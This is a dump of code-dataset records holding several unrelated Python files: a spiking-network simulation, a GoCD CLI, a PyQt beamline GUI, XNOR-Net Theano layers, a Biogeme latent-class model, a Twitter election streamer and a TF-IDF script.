'proc/pmod_spiketimes_iampa%d_inmda%d_gaba%d_inp%d_v%d_processing.txt') % (iampa, inmda, igaba, iinp,v)\n if os.path.isfile(fn)==False:\n call(['touch', fn])\n else:\n continue\n # initialize \n defaultclock.reinit()\n clear(True) \n\n print(\"Computing INPUT%d, GABA%d, AMPA%d and NMDA%d ...\" % (iinp, igaba,iampa,inmda))\n\n inp = 2000 * (inputs[iinp]**1.2 / (inputs[iinp]**1.2 + 0.133**1.2)) \n inh = 1\n AMPA_mod = AMPA_mods[iampa]\n NMDA_mod = NMDA_mods[inmda]\n GABA_mod = GABA_mods[igaba]\n\n Dgroups, Dconnections, Dnetfunctions, subgroups = make_integration_circuit(inp,GABA_mod,AMPA_mod,NMDA_mod)\n\n # get populations from the integration circuit\n decisionE = Dgroups['DE']\n decisionI = Dgroups['DI']\n\n # ---- set initial conditions (random)\n decisionE.gen = decisionE.gen * (1 + 0.2 * rand(decisionE.__len__()))\n decisionI.gen = decisionI.gen * (1 + 0.2 * rand(decisionI.__len__()))\n decisionE.V = decisionE.V + rand(decisionE.__len__()) * 2 * mV\n decisionI.V = decisionI.V + rand(decisionI.__len__()) * 2 * mV\n\n # record spikes of excitatory neurons\n Sp_E = SpikeMonitor(decisionE, record=True)\n # record spikes of inhibitory neurons\n Sp_I = SpikeMonitor(decisionI, record=True)\n # record instantaneous excitatory populations activity\n R_E = PopulationRateMonitor(decisionE, bin=5*ms)\n # record instantaneous inhibitory populations activity\n R_I = PopulationRateMonitor(decisionI, bin=5*ms)\n # record voltage\n Vm_E = StateMonitor(decisionE, 'V', record=True)\n Vm_I = StateMonitor(decisionI, 'V', record=True)\n\n #------------------------------------------------------------------------------\n # Run the simulation\n #------------------------------------------------------------------------------\n print(\"Running simulation...\")\n net = Network(Dgroups.values(), Dconnections.values(), Dnetfunctions, Sp_E, Sp_I, R_E, R_I, Vm_E, Vm_I)\n net.prepare()\n net.run(runtime) \n\n # convert to array and save output as .h5 \n spt_E = []; spt_E_idx = []\n spt_I = []; spt_I_idx = []\n\n 
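# Flatten the per-neuron spike-time dictionaries into two parallel arrays\n # (spike times and matching neuron indices), i.e. the usual raster layout:\n # a neuron k firing at 0.5 s and 1.2 s contributes [0.5, 1.2] and [k, k].\n 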
for ineuron in range(0,len(Sp_E.spiketimes)):\n spt_E = np.append(spt_E,Sp_E.spiketimes.values()[ineuron], axis=None)\n spt_E_idx = np.append(spt_E_idx,np.matlib.repmat(ineuron,1,len(Sp_E.spiketimes.values()[ineuron])), axis=None)\n\n for ineuron in range(0,len(Sp_I.spiketimes)):\n spt_I = np.append(spt_I,Sp_I.spiketimes.values()[ineuron], axis=None)\n spt_I_idx = np.append(spt_I_idx,np.matlib.repmat(ineuron,1,len(Sp_I.spiketimes.values()[ineuron])), axis=None)\n\n spt_E = np.vstack((spt_E,spt_E_idx))\n spt_I = np.vstack((spt_I,spt_I_idx))\n\n # COMPUTE SPIKE COUNT CORRELATIONS\n print(\"Computing spike count correlations...\")\n spikes = dict()\n first_spike = 1 # start analysis at 1s\n for ineuron in range(0,320):\n spikes[ineuron] = SpikeTrain(spt_E[0][(spt_E[1]==ineuron) & (spt_E[0]>first_spike)]*pq.s, t_start = 0.25, t_stop = 3.0)\n st = []\n subsamp = 1\n matidx = np.triu_indices(len(range(0,len(spikes),subsamp)),1)\n for isp in range(0,len(spikes),subsamp):\n st.append(spikes[isp])\n sts=BinnedSpikeTrain(st, binsize=10*pq.ms)\n corr=elephant.spike_train_correlation.corrcoef(sts)\n mean_corr = corr[matidx].mean()\n resp = sum(spt_E[0]>0.25)/(2.75*320)\n print(\"Saving output...\")\n hf = h5py.File(os.path.expanduser(root_dir + 'proc/pmod_spiketimes_iinp%d_ampa%d_nmda%d_gaba%d_v%d.h5') % (iinp, iampa, inmda, igaba, v), 'w')\n #hf.create_dataset('spt_E', data=spt_E)\n hf.create_dataset('spt_E_r', data=mean_corr)\n hf.create_dataset('spt_E_fr', data=resp)\n hf.close()\n\n\n","sub_path":"run_model_trials.py","file_name":"run_model_trials.py","file_ext":"py","file_size_in_byte":6921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"648909945","text":"#!/usr/bin/env python3\n\nimport argparse\n\n\ndef main():\n \"\"\" Runs program and handles CLI interaction \"\"\"\n\n parser = argparse.ArgumentParser(\n description='''\\\nDownload pipeline data from GO.CD and store locally.\nSample usage: go_cli pull -p pipeline-name\n go_cli pull -p pipeline-name -s 1900 -n 10\n go_cli pull -p pipeline-name -s 750''',\n formatter_class=argparse.RawDescriptionHelpFormatter\n )\n parser.add_argument(\n 'action',\n choices=['pull', 'info', 'export'])\n parser.add_argument(\n '-p', '--pipeline', type=str, default=None, help=\"Which PIPELINE to use.\")\n parser.add_argument(\n '-d', '--dry-run', action='store_true', default=False, help=\"Dry-run a command, without synchronizing or saving any data.\")\n parser.add_argument(\n '-n', '--next', type=int, default=None,\n help=\"Pull the subsequent NEXT number of pipeline counts from GO. 
Defaults to the number of pipelines currently not synced locally.\")\n parser.add_argument(\n '-s', '--start', type=int, default=0, help=\"Pull from START pipeline count.\")\n parser.add_argument(\n '-f', '--filename', type=str, default=\"cli_save\", help=\"FILENAME to save in ~/GO_CSV/\"\n )\n\n pargs = parser.parse_args()\n\n from gocddash.analysis import go_request\n from gocddash.analysis import actions\n\n if pargs.action == 'pull':\n if not pargs.pipeline:\n raise ValueError(\"No pipeline specified.\")\n if pargs.next is None:\n pargs.next = go_request.get_max_pipeline_status(pargs.pipeline)[0] - pargs.start\n actions.pull(pargs.pipeline, pargs.next, pargs.start, pargs.dry_run)\n elif pargs.action == 'export':\n if not pargs.pipeline:\n raise ValueError(\"No pipeline specified.\")\n actions.export(pargs.pipeline, \"~/GO_CSV/\" + pargs.filename + \".csv\", pargs.dry_run)\n elif pargs.action == 'info':\n if pargs.pipeline:\n actions.info(pargs.pipeline)\n else:\n actions.all_info()\n else:\n print(\"I have nothing to do.\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"go_cli.py","file_name":"go_cli.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"277583115","text":"from PyQt4 import QtCore,QtGui\nfrom controls import ControlsGroup\nfrom graph import Graph\nfrom backend import controlLoop, Voltage, Beamline\n\nfrom copy import deepcopy\n\nclass BeamlineApp(QtGui.QMainWindow):\n\n def __init__(self):\n super(BeamlineApp, self).__init__()\n\n self.beamline = Beamline()\n\n self.container = Container()\n self.controlsGroup = ControlsGroup(self.beamline)\n self.graph = Graph(self.beamline)\n self.init_UI()\n \n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.update)\n self.timer.start(30)\n\n def update(self):\n self.beamline.update()\n for c in self.controlsGroup.controls.values():\n c.update()\n self.graph.updateGraph()\n\n\n def init_UI(self):\n self.setCentralWidget(self.container)\n self.container.layout.addWidget(self.graph,0,0)\n self.container.layout.addWidget(self.controlsGroup,1,0)\n\n self.makeToolbar()\n\n self.show()\n\n def makeToolbar(self):\n self.toolbar = QtGui.QToolBar()\n self.toolbar.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.addToolBar(self.toolbar)\n\n self.saveAction = QtGui.QPushButton('Save',self)\n self.saveAction.clicked.connect(self.controlsGroup.save)\n self.toolbar.addWidget(self.saveAction)\n\n self.loadAction = QtGui.QPushButton('Load',self)\n self.loadAction.clicked.connect(self.controlsGroup.load)\n self.toolbar.addWidget(self.loadAction)\n\n self.optimizeAction = QtGui.QPushButton('Optimize',self)\n self.optimizeAction.clicked.connect(self.controlsGroup.optimize)\n self.toolbar.addWidget(self.optimizeAction)\n\n def closeEvent(self,event):\n self.beamline.controlProcess.terminate()\n for v in self.controlsGroup.beamline.voltages.values():\n v.stopRamp = True\n event.accept()\n\n def keyPressEvent(self,e):\n self.controlsGroup.keyPressed(e)\n e.ignore()\n\n\n\nclass Container(QtGui.QWidget):\n def __init__(self):\n super(Container,self).__init__()\n self.layout = QtGui.QGridLayout(self)\n","sub_path":"BeamlineApp.py","file_name":"BeamlineApp.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"93988021","text":"def repeated_word(string):\n word_array = []\n lowered_string = string.lower()\n for word in 
lowered_string.split():\n if word in word_array:\n print(word)\n return word\n else:\n word_array.append(word)\n\nrepeated_word('Dog cat turtle dog')","sub_path":"challenges/repeated_word/repeated_word.py","file_name":"repeated_word.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"88917313","text":"\"\"\" Class and method definition for the layers in XNOR-Net\n\"\"\"\nimport theano\nimport theano.tensor.nnet\nimport numpy as np\nimport lasagne\nimport theano.tensor as T\nimport time\nfrom external.bnn_utils import binary_tanh_unit\n\ndef binarize_conv_filters(W):\n \"\"\"Binarize convolution weights and find the weight scaling factor\n W : theano tensor : convolution layer weight of dimension no_filters x no_feat_maps x h x w\n \"\"\"\n # symbolic binary weight\n Wb = T.cast(T.switch(T.ge(W, 0),1,-1), theano.config.floatX) #Wb = sign(W)\n \n alpha = T.mean( T.reshape(T.abs_(W), (W.shape[0], W.shape[1]*W.shape[2]*W.shape[3])), axis=1) # computed separately for each filter\n\n return Wb, alpha\n\ndef binarize_conv_input(conv_input, k):\n\n bin_conv_out = binary_tanh_unit(conv_input) # x[x<0] = -1 x[x>=0] = 1\n\n # scaling factor for the activation.\n A =T.abs_(conv_input)\n\n # K will have scaling matrices for each input in the batch.\n \n k_shape = k.eval().shape # (num_filters, channels, height, width); k's height/width match the conv kernel's\n pad = (k_shape[-2]/2, k_shape[-1]/2) # assumes k's height and width are both odd\n # support the kernel stride. This is necessary for AlexNet\n K = theano.tensor.nnet.conv2d(A, k, border_mode=pad) # K's shape = (batch_size, 1, map_height, map_width)\n\n return bin_conv_out, K # binarized input and its scaling map K\n \n\n\ndef binarize_fc_weights(W):\n # symbolic binary weight\n Wb = T.cast(T.switch(T.ge(W, 0),1,-1), theano.config.floatX) # Wb = sign(W) \n\n alpha = T.mean(T.abs_(W), axis=0)\n return Wb, alpha\n\ndef binarize_fc_input(fc_input): # NOTE (original author): why is the input not reshaped into a vector here? presumably handled elsewhere\n\n bin_out = binary_tanh_unit(fc_input)\n \n if(fc_input.ndim == 4): # prev layer is conv or pooling. hence compute the l1 norm using all maps\n beta = T.mean(T.abs_(fc_input), axis=[1, 2, 3])\n\n else: # feeding layer is FC layer\n beta = T.mean(T.abs_(fc_input), axis=1)\n\n return bin_out, beta\n\n\n
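# Note: binary_tanh_unit (from external.bnn_utils) follows BinaryNet's\n# reference implementation: the forward pass returns sign(x) in {-1, +1}\n# while gradients flow through a hard-tanh (a straight-through estimator),\n# which is presumably what keeps the binarized layers below trainable.\n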
class Conv2DLayer(lasagne.layers.Conv2DLayer):\n \"\"\" Binary convolution layer which performs convolution using XNOR and popcount operations.\n This is followed by the scaling with input and weight scaling factors K and alpha respectively.\n \"\"\"\n\n def __init__(self, incoming, num_filters, filter_size, xnor=True, **kwargs):\n\n \"\"\"\n Parameters\n -----------\n incoming : layer or tuple\n Input layer to this layer. If this is fed by a data layer then this is a tuple representing input dimensions.\n num_filters: int\n Number of 3D filters present in this layer = No of feature maps generated by this layer\n filter_size: tuple\n Filter size of this layer. The leading dimension equals the number of input feature maps.\n \"\"\"\n self.xnor = xnor \n\n # average filter to compute scaling factor for activation\n no_inputs = incoming.output_shape[1] # number of input channels\n shape = (num_filters, no_inputs, filter_size[0], filter_size[1]) # conv kernel shape: (num_filters, channels, height, width)\n\n\n num_inputs = int(np.prod(filter_size)*incoming.output_shape[1]) # number of elements in one kernel (fan-in)\n num_units = int(np.prod(filter_size)*num_filters) # kernel elements times number of filters (fan-out)\n self.W_LR_scale = np.float32(1./np.sqrt(1.5 / (num_inputs + num_units))) # Glorot-style learning-rate scale, as in BinaryNet\n\n if(self.xnor):\n # xnor: initialize the real-valued weights within [-1, 1]\n super(Conv2DLayer, self).__init__(incoming,num_filters, filter_size, W=lasagne.init.Uniform((-1, 1)), **kwargs) \n self.params[self.W] = set(['xnor']) # tag W so custom update rules can single out the binary weights\n else:\n super(Conv2DLayer, self).__init__(incoming, num_filters, filter_size, **kwargs)\n\n\n if self.xnor:\n # beta_filter is an averaging kernel used to approximate the input scale;\n # one per filter / input patch\n beta_filter = np.ones(shape=shape).astype(np.float32) / (no_inputs*filter_size[0]*filter_size[1]) #shape = (num_of_filters,channel,height,width) \n self.beta_filter = self.add_param(beta_filter, shape, name='beta_filter', trainable=False, regularizable=False)\n \n Wb = np.zeros(shape=self.W.shape.eval(), dtype=np.float32) # holds the binarized weights\n # xalpha approximates the weight scale\n xalpha = lasagne.init.Constant(0.1) \n self.xalpha = self.add_param(xalpha, [num_filters,], name='xalpha', trainable=False, regularizable=False)\n # xalpha is computed once per filter, shape = (num_filters,)\n\n def convolve(self, input, deterministic=False, **kwargs): \n \"\"\" Binary convolution. Both inputs and weights are binary (+1 or -1)\n This overrides convolve operation from Conv2DLayer implementation\n \"\"\"\n if(self.xnor):\n # compute the binary inputs H and the scaling matrix K\n input, K = binarize_conv_input(input, self.beta_filter) # binarized input and K\n\n # Compute the binarized filters and the scaling factors\n self.Wb, alpha = binarize_conv_filters(self.W) # binarized weights and alpha\n \n if not deterministic: # training pass\n old_alpha = theano.clone(self.xalpha, share_inputs=False) # clone so the stored xalpha tracks the fresh alpha\n old_alpha.default_update = alpha \n alpha += 0*old_alpha\n else: # inference pass\n alpha = self.xalpha \n \n #alpha.shape = (num_of_filters,)\n \n Wr = self.W # Wr keeps the real-valued weights\n\n self.W = self.Wb # convolve (forward and backward) with the binarized weights\n\n feat_maps = super(Conv2DLayer, self).convolve(input, **kwargs) # convolution of binary input with binary weights\n \n self.W = Wr # restore the full-precision weights\n\n # NOTE (original author): problematic - the Conv2D op has already added the bias,\n # which should only be added after the scaling below. FIXME\n feat_maps = feat_maps * K # elementwise product; K broadcasts across the filter axis\n\n feat_maps = feat_maps * alpha.dimshuffle('x', 0, 'x', 'x') # reshape alpha to (1, num_filters, 1, 1) and broadcast; final approximate convolution\n \n else: # plain convolution\n feat_maps = super(Conv2DLayer, self).convolve(input, **kwargs)\n \n return feat_maps\n\n
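# The two scaled products above implement the XNOR-Net approximation\n# (Rastegari et al., 2016): conv(I, W) ~ conv(sign(I), sign(W)) * K * alpha,\n# where K is |I| averaged over each receptive field and alpha is the mean\n# absolute weight of each filter.\n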
class DenseLayer(lasagne.layers.DenseLayer):\n \"\"\"Binary version of fully connected layer. XNOR and bitcount ops are used for\n this in a similar fashion to the Conv layer.\n \"\"\"\n\n def __init__(self, incoming, num_units, xnor=True, **kwargs):\n \"\"\" XNOR-Net fully connected layer\n \"\"\"\n self.xnor = xnor\n num_inputs = int(np.prod(incoming.output_shape[1:])) # number of input elements (single sample, no batch dimension)\n self.W_LR_scale = np.float32(1./np.sqrt(1.5/ (num_inputs + num_units))) # num_units is the number of output units of the FC layer\n if(self.xnor):\n super(DenseLayer, self).__init__(incoming, num_units, W=lasagne.init.Uniform((-1, 1)), **kwargs)\n self.params[self.W]=set(['xnor'])\n else:\n super(DenseLayer, self).__init__(incoming, num_units, **kwargs)\n\n if self.xnor:\n #Wb = np.zeros(shape=self.W.shape.eval(), dtype=np.float32)\n xalpha = np.zeros(shape=(num_units,), dtype=np.float32) # weight-scale coefficients\n self.xalpha = self.add_param(xalpha, xalpha.shape, name='xalpha', trainable=False, regularizable=False)\n #self.Wb = self.add_param(Wb, Wb.shape, name='Wb', trainable=False, regularizable=False)\n\n def get_output_for(self, input, deterministic=False, **kwargs):\n \"\"\" Binary dense layer dot product computation\n \"\"\"\n if(self.xnor):\n # binarize the input\n bin_input, beta = binarize_fc_input(input)\n\n # compute weight scaling factor.\n self.Wb, alpha = binarize_fc_weights(self.W)\n \n if not deterministic: # training pass\n old_alpha = theano.clone(self.xalpha, share_inputs=False)\n old_alpha.default_update = alpha # default_update writes the freshly computed alpha back into xalpha\n alpha += 0*old_alpha\n else: # inference pass\n alpha = self.xalpha\n\n #W_full_precision = self.Wb * alpha.dimshuffle('x', 0)\n Wr = self.W\n self.W = self.Wb\n \n # NOTE (original author): same issue as the conv layer - the bias should not be added before the scaling below\n fc_out = super(DenseLayer, self).get_output_for(bin_input, **kwargs)\n \n fc_out = fc_out * beta.dimshuffle(0, 'x')\n\n fc_out = fc_out * alpha.dimshuffle('x', 0)\n \n #self.W = W_full_precision\n self.W = Wr\n else:\n fc_out = super(DenseLayer, self).get_output_for(input, **kwargs)\n\n return fc_out\n\n # find the dot product\n # scale the output by alpha and beta\n\n","sub_path":"train/xnor_net.py","file_name":"xnor_net.py","file_ext":"py","file_size_in_byte":9021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"377593246","text":"\"\"\"File 15panelDiscreteBis.py\n\n:author: Michel Bierlaire, EPFL\n:date: Sun Sep 8 19:30:31 2019\n\n Example of a discrete mixture of logit models, also called latent class model.\n The datafile is organized as panel data.\n Here, we integrate before the discrete mixture to show that it is equivalent.\n Three alternatives: Train, Car and Swissmetro\n SP data\n\"\"\"\n\nimport pandas as pd\nimport biogeme.database as db\nimport biogeme.biogeme as bio\nimport biogeme.models as models\nimport biogeme.messaging as msg\nfrom biogeme.expressions import Beta, DefineVariable, bioDraws, \\\n PanelLikelihoodTrajectory, MonteCarlo, log\n\n# Read the data\ndf = pd.read_csv('swissmetro.dat', '\\t')\ndatabase = db.Database('swissmetro', df)\n\n# They are organized as panel data. The variable ID identifies each individual.\ndatabase.panel(\"ID\")\n\n
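# Because of this panel declaration, PanelLikelihoodTrajectory (used further\n# down) multiplies the choice probabilities of all observations belonging to\n# the same individual before the Monte-Carlo integration.\n\n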
# The Pandas data structure is available as database.data. Use all the\n# Pandas functions to investigate the database\n#print(database.data.describe())\n\n# The following statement allows you to use the names of the variable\n# as Python variable.\nglobals().update(database.variables)\n\n# Removing some observations can be done directly using pandas.\n#remove = (((database.data.PURPOSE != 1) &\n# (database.data.PURPOSE != 3)) |\n# (database.data.CHOICE == 0))\n#database.data.drop(database.data[remove].index,inplace=True)\n\n# Here we use the \"biogeme\" way for backward compatibility\nexclude = ((PURPOSE != 1) * (PURPOSE != 3) + (CHOICE == 0)) > 0\ndatabase.remove(exclude)\n\n# Parameters to be estimated. One version for each latent class.\nnumberOfClasses = 2\nB_COST = [Beta(f'B_COST_class{i}', 0, None, None, 0) for i in range(numberOfClasses)]\n\n# Define a random parameter, normally distributed across individuals,\n# designed to be used for Monte-Carlo simulation\nB_TIME = [Beta(f'B_TIME_class{i}', 0, None, None, 0) for i in range(numberOfClasses)]\n\n# It is advised not to use 0 as starting value for the following parameter.\nB_TIME_S = [Beta(f'B_TIME_S_class{i}', 1, None, None, 0) for i in range(numberOfClasses)]\nB_TIME_RND = [B_TIME[i] + B_TIME_S[i] * bioDraws(f'B_TIME_RND_class{i}', 'NORMAL_ANTI')\n for i in range(numberOfClasses)]\n\n# We do the same for the constants, to address serial correlation.\nASC_CAR = [Beta(f'ASC_CAR_class{i}', 0, None, None, 0) for i in range(numberOfClasses)]\nASC_CAR_S = [Beta(f'ASC_CAR_S_class{i}', 1, None, None, 0) for i in range(numberOfClasses)]\nASC_CAR_RND = [ASC_CAR[i] + ASC_CAR_S[i] * bioDraws(f'ASC_CAR_RND_class{i}', 'NORMAL_ANTI')\n for i in range(numberOfClasses)]\n\nASC_TRAIN = [Beta(f'ASC_TRAIN_class{i}', 0, None, None, 0) for i in range(numberOfClasses)]\nASC_TRAIN_S = [Beta(f'ASC_TRAIN_S_class{i}', 1, None, None, 0) for i in range(numberOfClasses)]\nASC_TRAIN_RND = [ASC_TRAIN[i] + ASC_TRAIN_S[i] * bioDraws(f'ASC_TRAIN_RND_class{i}', 'NORMAL_ANTI')\n for i in range(numberOfClasses)]\n\nASC_SM = [Beta(f'ASC_SM_class{i}', 0, None, None, 1) for i in range(numberOfClasses)]\nASC_SM_S = [Beta(f'ASC_SM_S_class{i}', 1, None, None, 0) for i in range(numberOfClasses)]\nASC_SM_RND = [ASC_SM[i] + ASC_SM_S[i] * bioDraws(f'ASC_SM_RND_class{i}', 'NORMAL_ANTI')\n for i in range(numberOfClasses)]\n\n# Class membership probability\nPROB_class0 = Beta('PROB_class0', 0.5, 0, 1, 0)\nPROB_class1 = 1 - PROB_class0\n\n# Definition of new variables\nSM_COST = SM_CO * (GA == 0)\nTRAIN_COST = TRAIN_CO * (GA == 0)\n\n# Definition of new variables: adding columns to the database\nCAR_AV_SP = DefineVariable('CAR_AV_SP', CAR_AV * (SP != 0), database)\nTRAIN_AV_SP = DefineVariable('TRAIN_AV_SP', TRAIN_AV * (SP != 0), database)\nTRAIN_TT_SCALED = DefineVariable('TRAIN_TT_SCALED', TRAIN_TT / 100.0, database)\nTRAIN_COST_SCALED = DefineVariable('TRAIN_COST_SCALED', TRAIN_COST / 100, database)\nSM_TT_SCALED = DefineVariable('SM_TT_SCALED', SM_TT / 100.0, database)\nSM_COST_SCALED = DefineVariable('SM_COST_SCALED', SM_COST / 100, database)\nCAR_TT_SCALED = DefineVariable('CAR_TT_SCALED', CAR_TT / 100, database)\nCAR_CO_SCALED = DefineVariable('CAR_CO_SCALED', CAR_CO / 100, database)\n\n# In class 0, it is assumed that the time coefficient is zero\nB_TIME_RND[0] = 0\n\n
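# Latent-class structure: each class gets its own coefficients; with the\n# time coefficient of class 0 pinned to zero, the model separates\n# time-insensitive travellers from those who trade time against cost.\n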
# Utility functions\nV1 = [ASC_TRAIN_RND[i] + B_TIME_RND[i] * TRAIN_TT_SCALED + B_COST[i] * TRAIN_COST_SCALED\n for i in range(numberOfClasses)]\nV2 = [ASC_SM_RND[i] + B_TIME_RND[i] * SM_TT_SCALED + B_COST[i] * SM_COST_SCALED\n for i in range(numberOfClasses)]\nV3 = [ASC_CAR_RND[i] + B_TIME_RND[i] * CAR_TT_SCALED + B_COST[i] * CAR_CO_SCALED\n for i in range(numberOfClasses)]\nV = [{1: V1[i],\n 2: V2[i],\n 3: V3[i]} for i in range(numberOfClasses)]\n\n# Associate the availability conditions with the alternatives\nav = {1: TRAIN_AV_SP,\n 2: SM_AV,\n 3: CAR_AV_SP}\n\n# The choice model is a discrete mixture of logit, with availability conditions\n# We calculate the conditional probability for each class\nprob = [MonteCarlo(PanelLikelihoodTrajectory(models.logit(V[i], av, CHOICE)))\n for i in range(numberOfClasses)]\n\n# Conditional to the random variables, likelihood for the individual.\nprobIndiv = PROB_class0 * prob[0] + PROB_class1 * prob[1]\n\n# The random parameters were already integrated out by MonteCarlo above;\n# take the log to obtain the individual log likelihood.\nlogprob = log(probIndiv)\n\n# Define level of verbosity\nlogger = msg.bioMessage()\n#logger.setSilent()\n#logger.setWarning()\nlogger.setGeneral()\n#logger.setDetailed()\n\n# Create the Biogeme object\nbiogeme = bio.BIOGEME(database, logprob, numberOfDraws=100000)\nbiogeme.modelName = '15panelDiscreteBis'\n\n# As the estimation may take a while and risks being interrupted, we save the iterations,\n# and restore them before the estimation.\nfname = \"__15panelDiscreteBis.iters\"\nbiogeme.loadSavedIteration(filename=fname)\n# Estimate the parameters.\nresults = biogeme.estimate(saveIterations=True, file_iterations=fname)\npandasResults = results.getEstimatedParameters()\nprint(pandasResults)\n","sub_path":"examples/swissmetro/15panelDiscreteBis.py","file_name":"15panelDiscreteBis.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"213137904","text":"import sys\n\nfrom PyQt5 import QtWidgets\nfrom views.GUI import Ui_mainWindow\n\n\ndef errors():\n # Back up the reference to the exceptionhook\n sys._excepthook = sys.excepthook\n\n def my_exception_hook(exctype, value, traceback):\n # Print the error and traceback\n print(exctype, value, traceback)\n # Call the normal Exception hook after\n sys._excepthook(exctype, value, traceback)\n sys.exit(1)\n\n # Set the exception hook to our wrapping function\n sys.excepthook = my_exception_hook\n return\n\n\ndef main():\n errors()\n try:\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_mainWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n except:\n print(\"Exiting\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"219244458","text":"__author__ = 'enestaylan'\n\nimport time\nfrom datetime import datetime\nimport tweepy\nfrom tweepy import Stream\nfrom Shared.IanusListener import IanusListener\nimport Shared.configs as configs\n\n\ndef getTwitterClient():\n auth = tweepy.OAuthHandler(configs.consumer_key, configs.consumer_secret)\n auth.set_access_token(configs.access_token, configs.access_token_secret)\n\n return auth\n\n\ndef beginStream(client, keyword_list):\n # twitterStream = Stream(auth=client, listener=IanusListener(filePath=\"/media/enes/LinuxD/usa42.json\"))\n twitterStream = Stream(auth=client, listener=IanusListener(filePath=\"/home/enes/Desktop/data/usa44.json\"))\n twitterStream.filter(track=keyword_list, languages=[\"en\"]) # https://github.com/tweepy/tweepy/issues/615\n\n\ndef main():\n client = getTwitterClient()\n keyword_list = getKeywords()\n\n 
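# Keep the stream alive: tweepy raises on disconnects and rate limits, so\n # back off for two minutes and reconnect instead of crashing.\n 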
while True:\n try:\n beginStream(client, keyword_list)\n\n except BaseException as e:\n print(\"LOOP----\", datetime.now(), \"------\", str(e))\n time.sleep(120)\n pass\n\n\ndef getKeywords():\n trump = [\"Donald Trump\", \"@realDonaldTrump\"]\n cruz = [\"Ted Cruz\", \"@tedcruz\"]\n rubio = [\"Marco Rubio\", \"@marcorubio\"]\n carson = [\"Ben Carson\", \"@RealBenCarson\"]\n kasich = [\"John Kasich\", \"@JohnKasich\"]\n bush = [\"Jeb Bush\", \"@JebBush\"]\n\n sanders = [\"Bernie Sanders\", \"@BernieSanders\"]\n clinton = [\"Hillary Clinton\", \"@HillaryClinton\"]\n\n return trump + cruz + rubio + carson + kasich + bush + sanders + clinton\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"USA/electionStreamer.py","file_name":"electionStreamer.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"165650711","text":"# open and read file \ninput('Initiating Vector Space Modeling protocol... Press any key to continue.')\nfilename = input('Within your current directory, please provide the filename: ')\nprint('\\nVectorizing documents, weighting scheme pending...') \nnewfile = open(filename, 'r')\nfilestring = newfile.readlines()\n# re-organize the information into a dictionary with key-value pairs\nseparate_documents = {}\n# set an accumulator that will serve two purposes - dictionary key and document ID\ndoc_id = 1\n# count controlled loop to iterate each line of our corpus (each line is a document)\nfor document in filestring:\n # map each line (each document) to its ID in the dictionary\n separate_documents[doc_id] = document\n doc_id += 1\n# generate a tf-idf representation\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n
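# The percentage threshold below is converted into an absolute document\n# count for min_df, e.g. 5% of a 200-document corpus gives min_df = 10.\n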
# conditional logic for individual tokens or phrases (n-grams)\nchoice = input('Analyze tokens or n-grams? ')\nif 't' in choice.lower():\n # set a minimum document frequency threshold \n document_frequency = float(input('Select a minimum document frequency % threshold: '))\n threshold = int(document_frequency)/100 * (len(separate_documents))\n tf_idf = TfidfVectorizer(input=newfile,min_df=int(threshold),use_idf=True,stop_words='english')\n weights = tf_idf.fit_transform(separate_documents.values())\n feature_names = tf_idf.get_feature_names()\n corpus_index = [n for n in separate_documents] \n # wrap feature names and corpus index into a data frame (matrix)\n import pandas as p\n matrix = p.DataFrame(weights.todense(),index=corpus_index,columns=feature_names)\n matrix.to_csv('tf_idf_matrix.csv')\nelif 'g' in choice.lower():\n # set a minimum document frequency threshold \n document_frequency = float(input('Select a minimum document frequency % threshold: '))\n threshold = int(document_frequency)/100 * (len(separate_documents))\n n_grams = int(input('Set an upper range for tokens that can be included in a phrase: '))\n tf_idf = TfidfVectorizer(input=newfile,min_df=int(threshold),use_idf=True,ngram_range=(2,n_grams),stop_words='english')\n weights = tf_idf.fit_transform(separate_documents.values())\n feature_names = tf_idf.get_feature_names()\n corpus_index = [n for n in separate_documents] \n # wrap feature names and corpus index into a data frame (matrix)\n import pandas as p\n matrix = p.DataFrame(weights.todense(),index=corpus_index,columns=feature_names)\n matrix.to_csv('tf_idf_matrix.csv')\n\n","sub_path":"tf_idf_matrix_csv.py","file_name":"tf_idf_matrix_csv.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
